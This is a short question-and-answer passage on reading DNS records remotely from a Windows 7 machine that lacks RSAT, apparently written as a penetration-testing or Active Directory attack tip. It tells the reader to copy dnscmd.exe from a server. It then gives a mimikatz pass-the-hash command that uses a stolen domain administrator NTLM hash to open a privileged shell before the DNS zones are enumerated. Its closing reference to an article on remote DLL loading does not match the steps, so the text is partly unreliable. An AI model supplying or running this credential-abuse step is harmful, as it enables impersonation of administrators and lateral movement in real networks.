How can I remotely read DNS records from a Windows 7 machine that lacks RSAT?

First, copy `dnscmd.exe` to `C:\Windows\System32` and `dnscmd.exe.mui` to `C:\Windows\System32\en-US` from a Windows Server 2008 R2 system. Then use mimikatz's Overpass-the-hash technique to spawn a command prompt with domain admin credentials (e.g., `sekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH`). In that prompt, run `Dnscmd <DNS_SERVER_FQDN> /EnumZones` to query remotely. This method bypasses the need for RSAT installation, as explained in the article on remote DLL loading.